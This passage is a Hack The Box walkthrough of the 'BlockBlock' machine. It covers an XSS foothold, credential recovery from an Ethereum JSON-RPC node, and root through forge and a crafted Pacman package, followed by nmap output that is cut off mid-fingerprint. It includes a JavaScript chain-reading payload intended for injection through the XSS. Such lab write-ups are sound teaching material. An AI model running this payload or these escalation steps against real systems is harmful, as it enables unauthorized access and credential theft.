Hack The Box: BlockBlock Machine Walkthrough – Hard Difficulty
Tags: Hard Machine, Authentication Bypass, BurpSuite, Challenges, Ethereum Classic Exploit, Forge Binary Privilege Escalation, HackTheBox, JSON-RPC Vulnerability, JWT Token Extraction, Linux, Pacman Package Manager Misconfiguration, Penetration Testing, ssh, XSS Attack

Introduction to BlockBlock:

This walkthrough will explore the “BlockBlock” machine from Hack The Box, categorized as a hard-difficulty challenge. This guide will cover the reconnaissance, exploitation, and privilege escalation techniques used to capture user and root flags.
Objective for BlockBlock machine:
The goal of this walkthrough is to fully compromise the “BlockBlock” machine by obtaining both the user and root flags.
User Flag:
The first step was to gain initial access by exploiting a web-based vulnerability. Enumeration turned up an XSS vulnerability that allowed a malicious JavaScript payload to be injected. That payload interacted with the Ethereum JSON-RPC API and revealed stored credentials; those credentials gave SSH access to the box and with it the user flag. This foothold set the stage for privilege escalation.
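The interaction with the node described above is plain Ethereum JSON-RPC. The block below is an added example, not code from the original walkthrough or from the machine: it issues eth_blockNumber and eth_getBlockByNumber through an injected fetch, decodes each transaction's hex input field to UTF-8 and keeps the printable runs. The RPC URL, the sample chain and the transaction contents are constructed for the example, and the idea that the credentials sit in transaction input data is an assumption made here, not something this section states.

```javascript
// Added example (not from the original walkthrough or the machine): the read
// side of a script that talks to an Ethereum JSON-RPC endpoint. It walks the
// chain with eth_blockNumber / eth_getBlockByNumber and decodes each
// transaction's hex `input` field to UTF-8, which is where plaintext written
// to the chain would end up (an assumption for this example). fetch is
// injected so the same code runs as a browser payload (global fetch) or
// offline against the stub at the bottom.

function buildRpcRequest(method, params, id = 1) {
  return { jsonrpc: "2.0", id, method, params };
}

function utf8ToHex(text) {
  const bytes = new TextEncoder().encode(text);
  return "0x" + Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join("");
}

function hexToUtf8(hex) {
  const clean = hex.startsWith("0x") ? hex.slice(2) : hex;
  if (clean.length % 2 !== 0) throw new Error("odd-length hex string");
  const bytes = new Uint8Array(clean.length / 2);
  for (let i = 0; i < bytes.length; i++) {
    bytes[i] = parseInt(clean.slice(i * 2, i * 2 + 2), 16);
  }
  // fatal:false maps invalid byte sequences (ABI-encoded calls, addresses) to U+FFFD
  return new TextDecoder("utf-8", { fatal: false }).decode(bytes);
}

function printableStrings(text, minLen = 4) {
  // Runs of printable ASCII at least minLen long; U+FFFD and control bytes break runs.
  const re = new RegExp("[\\x20-\\x7e]{" + minLen + ",}", "g");
  return text.match(re) || [];
}

function extractTxInputs(block) {
  // eth_getBlockByNumber with fullTransactionObjects=true returns tx objects carrying `input`.
  return (block.transactions || [])
    .filter((tx) => typeof tx === "object" && tx.input && tx.input !== "0x")
    .map((tx) => ({ hash: tx.hash, from: tx.from, to: tx.to, strings: printableStrings(hexToUtf8(tx.input)) }));
}

async function rpcCall(rpcUrl, method, params, fetchFn, id = 1) {
  const res = await fetchFn(rpcUrl, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(buildRpcRequest(method, params, id)),
  });
  const body = await res.json();
  if (body.error) throw new Error(`RPC error ${body.error.code}: ${body.error.message}`);
  return body.result;
}

async function walkChain(rpcUrl, fetchFn, fromBlock = 0) {
  const latest = parseInt(await rpcCall(rpcUrl, "eth_blockNumber", [], fetchFn), 16);
  const findings = [];
  for (let n = fromBlock; n <= latest; n++) {
    const block = await rpcCall(rpcUrl, "eth_getBlockByNumber", ["0x" + n.toString(16), true], fetchFn, n + 2);
    if (!block) continue;
    for (const entry of extractTxInputs(block)) {
      if (entry.strings.length > 0) findings.push({ block: n, ...entry });
    }
  }
  return findings;
}

// Constructed sample chain (not captured from the machine): block 1 carries a
// UTF-8 payload in a transaction input, block 2 carries an ABI-encoded call.
const SAMPLE_CHAIN = {
  "0x0": { number: "0x0", transactions: [] },
  "0x1": { number: "0x1", transactions: [{
    hash: "0x" + "11".repeat(32), from: "0x" + "aa".repeat(20), to: "0x" + "bb".repeat(20),
    input: utf8ToHex("user=demo;password=Example123!"),
  }] },
  "0x2": { number: "0x2", transactions: [{
    hash: "0x" + "22".repeat(32), from: "0x" + "aa".repeat(20), to: "0x" + "cc".repeat(20),
    input: "0xa9059cbb" + "00".repeat(64), // transfer(address,uint256) selector plus two zeroed 32-byte args
  }] },
};

// Stub fetch answering from SAMPLE_CHAIN; a browser payload would pass globalThis.fetch instead.
async function stubFetch(url, init) {
  const req = JSON.parse(init.body);
  let result = null;
  if (req.method === "eth_blockNumber") result = "0x2";
  else if (req.method === "eth_getBlockByNumber") result = SAMPLE_CHAIN[req.params[0]] || null;
  return { json: async () => ({ jsonrpc: "2.0", id: req.id, result }) };
}

if (typeof require !== "undefined" && require.main === module) {
  walkChain("http://rpc.example.invalid/", stubFetch).then((f) => console.log(JSON.stringify(f, null, 2)));
}
```

Against the constructed chain the walk reports one finding in block 1 and nothing for the ABI-encoded call in block 2, because the selector and zero-padded arguments never form a printable run. Against a real node you would pass the page's RPC URL and the browser's fetch; the same-origin restrictions that apply are exactly the CORS headers the Nmap output below shows the application sending.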
Root Flag:
After securing user access, further enumeration revealed two misconfigurations that could be chained for privilege escalation. First, the forge binary could be executed with elevated privileges, and its ability to write files allowed escalation to a more privileged user (Paul). Second, the Pacman package manager could also be invoked with elevated privileges; we crafted a malicious package and installed it, which granted root and yielded the root flag. This stage highlights why developer tooling and package management must not be granted elevated execution rights: both can write arbitrary files as the privileged user.
Enumerating the BlockBlock Machine
Reconnaissance:
Nmap Scan:
The first step was an Nmap scan with default scripts and version detection to identify open ports and services:
nmap -sC -sV -oA initial 10.10.11.43
Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/blockblock]
└──╼ $nmap -sC -sV -oA initial 10.10.11.43
# Nmap 7.94SVN scan initiated Tue Mar 25 23:10:29 2025 as: nmap -sC -sV -oA initial 10.10.11.43
Nmap scan report for 10.10.11.43
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.7 (protocol 2.0)
| ssh-hostkey:
| 256 d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73 (ECDSA)
|_ 256 f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92 (ED25519)
80/tcp open http Werkzeug/3.0.3 Python/3.12.3
|_http-title: Home - DBLC
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.12.3
| Date: Tue, 25 Mar 2025 20:27:31 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 275864
| Access-Control-Allow-Origin: http://0.0.0.0/
| Access-Control-Allow-Headers: Content-Type,Authorization
| Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| Home - DBLC
| </title>
| <link rel="stylesheet" href="/assets/nav-bar.css">
| </head>
| <body>
| <!-- <main> -->
| <meta charset=utf-8>
| <meta name=viewport content="width=device-width, initial-scale=1">
| <style>
| :after,
| :before {
| box-sizing: border-box;
| border: 0 solid #e5e7eb
| :after,
| :before {
| --tw-content: ""
| :host,
| html {
| line-height: 1.5;
| HTTPOptions:
| HTTP/1.1 500 INTERNAL SERVER ERROR
| Server: Werkzeug/3.0.3 Python/3.12.3
| Date: Tue, 25 Mar 2025 20:27:31 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 265
| Access-Control-Allow-Origin: http://0.0.0.0/
| Access-Control-Allow-Headers: Content-Type,Authorization
| Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
| Connection: close
| <!doctype html>
| <html lang=en>
| <title>500 Internal Server Error</title>
| <h1>Internal Server Error</h1>
|_ <p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=3/25%Time=67E3703C%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,3004,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.0\.3\x
SF:20Python/3\.12\.3\r\nDate:\x20Tue,\x2025\x20Mar\x202025\x2020:27:31\x20
SF:GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\
SF:x20275864\r\nAccess-Control-Allow-Origin:\x20http://0\.0\.0\.0/\r\nAcce
SF:ss-Control-Allow-Headers:\x20Content-Type,Authorization\r\nAccess-Contr
SF:ol-Allow-Methods:\x20GET,POST,PUT,DELETE,OPTIONS\r\nConnection:\x20clos
SF:e\r\n\r\n\n\n\n\n\x20\x20\x20\x20 \
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20Home\x20\x20-\x20DBLC\n\x20\x20\x2
SF:0\x20\n\x20\x20\x20\x20\"stylesheet\"\x20href=\"/a
SF:ssets/nav-bar\.css\">\n\n\n\n\x20\x20\x20\x20\n\n\x20\x20\
SF:x20\x20\n\x20\x20\x20\x20\n\x20\x20\x20\x20
SF:20charset=utf-8>\n\x20\x20\x20\x20\"w
SF:idth=device-width,\x20initial-scale=1\">\n\x20\x20\x20\x20